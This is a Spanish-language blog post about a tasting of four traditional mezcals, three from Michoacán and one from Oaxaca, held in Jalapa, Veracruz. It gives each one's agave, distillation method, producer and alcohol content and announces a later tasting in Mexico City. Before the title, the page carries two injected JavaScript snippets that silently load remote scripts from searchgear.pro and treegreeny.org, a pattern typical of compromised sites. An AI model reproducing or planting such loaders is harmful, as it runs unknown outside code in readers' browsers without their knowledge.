;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 28. Mezcal en Veracruz

28. Mezcal en Veracruz


Cuatro fueron los mezcales tradicionales saboreados en ZONACENTRO, espacio cultural en el centro de Jalapa: 3 de Michoacán y 1 de Oaxaca. Esto dentro de la presentación de la Logia de los Mezcólatras en tierras veracruzanas, llevada a cabo el jueves 10 de junio. Los mezcales fueron:
1. De Maguey Chino silvestre de 8 a 10 años de edad, destilado en alambique de cobre con capitel formado por tiras de madera y condensación interna; doble destilación. Riqueza alcohólica: 48.5% ALC. VOL. Elaborado en Piedras de Lumbre, Morelia, Michoacán, por Emilio Vieyra en 2009. Marca: Don Mateo de la Sierra.
2. De Maguey Chino (8 a 10 años) y Maguey Chato (9 a 10), ambos silvestres. Se destiló en alambique de cobre con capitel de tiras de madera y condensación interna; doble destilación. Riqueza alcohólica: 47.8% ALC. VOL. Elaborado en Tzitzio, Michoacán, por Don Jerónimo en 2009. Marca: La perla de Tzitzio.
3. De Maguey Alto silvestre (9 a 10 años), destilado en alambique de cobre con capitel de tronco de oyamel ahuecado; dos destilaciones. En la fermentación se adicionó pulque de maguey Manso de la región. Riqueza alcohólica: 49.7% ALC. VOL. Elaborado en Río de Parras, Queréndaro, Michoacán, en 2009 por Don Isidoro. Marca: El Peñasco.
4. De maguey Mexicano cultivado (10 a 13 años) y maguey Tobasiche silvestre (8 años). Elaborado en Yogana, Ejutla, Oaxaca, por José García en abril de 2004; se destiló en alambique de cobre mediante una destilación y condensación externa. Riqueza alcohólica: 52% ALC. VOL. Envasado bajo el sello de Mezcales Tradicionales de los Pueblos de México.
Los asistentes quedaron sorprendidos con los sabores y aromas florales, frutales, cítricos, amaderados y pulcosos de los michoacanos, así como con los minerales, terrosos, fibrosos, especiados y avainillados del oaxaqueño.
Para continuar sorprendidos, acudamos a la Tertulia Mezcalera en Red Fly (Orizaba 145, Roma, DF) el martes 15 a las 20:00 horas. Saborearemos mezcal de maguey Verde de Durango y otra maravilla más.
http://impreso.milenio.com/node/8782792

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *